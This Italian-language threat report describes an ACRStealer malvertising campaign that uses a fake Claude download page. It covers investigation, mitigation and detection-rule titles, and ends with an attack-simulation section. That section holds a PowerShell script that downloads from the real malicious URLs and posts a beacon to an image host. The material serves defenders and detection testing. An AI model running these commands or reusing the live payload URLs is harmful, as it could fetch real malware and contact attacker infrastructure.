Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
I ricercatori sulle minacce hanno identificato una campagna pubblicitaria malevola che reindirizza gli utenti a una falsa pagina di download di Claude. Il sito distribuisce diversi payload a seconda del sistema operativo della vittima, con la catena di infezione di Windows che porta alla distribuzione di ACRStealer. Gli investigatori hanno collegato l’attività a domini compromessi e un server di comando e controllo utilizzato dopo l’infezione. La campagna si basa su URL offuscati e uno script PowerShell per completare la consegna del payload.
Investigazione
L’analista ha tracciato l’attività dalla iniziale falsa pagina di Claude attraverso diversi URL reindirizzati ospitati su vari domini. Durante la catena di infezione, sono stati scaricati un archivio ZIP, uno script PowerShell e un’immagine JPEG, seguiti da comunicazione HTTPS con un dominio di comando e controllo. L’analisi del traffico ha confermato che il comportamento della rete post-infezione corrispondeva all’infrastruttura associata alla famiglia ACRStealer.
Mitigazione
Le organizzazioni dovrebbero bloccare i domini e gli URL malevoli identificati al perimetro della rete. Il traffico pubblicitario dovrebbe essere filtrato per annunci malevoli che fanno riferimento alla falsa pagina di Claude o ad esche di impersonificazione simili. La protezione degli endpoint dovrebbe anche essere configurata per rilevare comportamenti collegati a ACRStealer e esecuzioni sospette di PowerShell.
Risposta
I difensori dovrebbero monitorare le connessioni in uscita verso il dominio di comando e controllo yw.enhanceblabber.cc e allertare sui download dell’archivio ZIP e dello script PowerShell identificati. Qualsiasi host che mostri attività correlate dovrebbe essere sottoposto a raccolta forense per possibili artefatti ACRStealer e essere isolato se viene confermata una compromissione.
Flusso dell’attacco
Stiamo ancora aggiornando questa parte. Iscriviti per essere notificato
AvvisamiRilevazioni
Comportamento sospetto di evasione della difesa di LOLBAS MSHTA attraverso rilevazione di comandi associati (via process_creation)
Visualizza
Comando e controllo sospetti tramite Richiesta DNS di Dominio di Primo Livello (TLD) Inusuale (via dns)
Visualizza
IOC (HashSha256) per rilevare: Possibile ACR Stealer da Pagina che Imita Claude
Visualizza
Rilevazione della Distribuzione di ACR Stealer tramite False Pagine di Download di Claude [Connessione di Rete Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Preliminare di Telemetria & Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare l’esatta telemetria prevista dalla logica di rilevamento.
-
Narrazione e Comandi dell’Attacco:
- Esposizione Iniziale: L’attaccante invia un’email di phishing contenente un link a
https://fairpoint29.com/. La vittima clicca sul link, che carica una falsa pagina di download di Claude. - Esecuzione di Downloader Malevolo: La pagina avvia automaticamente un download da
https://primemetricsa.com/1518925, fornendo un payload camuffato. - Recupero del Payload Secondario: Lo stub scaricato contatta
https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42dper recuperare il binario completo di ACR Stealer. - C2 Beacon: Una volta eseguito, il malware invia un segnale a
https://i.ibb.co/Xx16sbMz/init-block.jpg(una tecnica che sfrutta l’hosting di immagini per un C2 nascosto).
Ogni passaggio genera una voce di registro proxy che corrisponde esattamente
al dominioandurldefinito nella regola Sigma, soddisfacendo così la condizione di rilevamento. - Esposizione Iniziale: L’attaccante invia un’email di phishing contenente un link a
-
Script di Test di Regressione:
# ------------------------------------------------- # Simulazione di Distribuzione ACR Stealer – Regola di Attivazione # ------------------------------------------------- # Passo 1: Finta pagina di download di Claude (GET innocuo) Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null # Passo 2: Esecuzione binaria del downloader (simulato tramite download di un piccolo file) Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing # Passo 3: Recupero del payload completo Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" ` -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing # Passo 4: C2 beacon (POST di una piccola immagine per mascherare il traffico) $body = [System.Text.Encoding]::UTF8.GetBytes("beacon") Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" ` -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null # ------------------------------------------------- # Fine della Simulazione # ------------------------------------------------- -
Comandi di Pulizia:
# Rimuovi gli artefatti scaricati Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue # Cancella cache DNS per evitare voci persistenti ipconfig /flushdns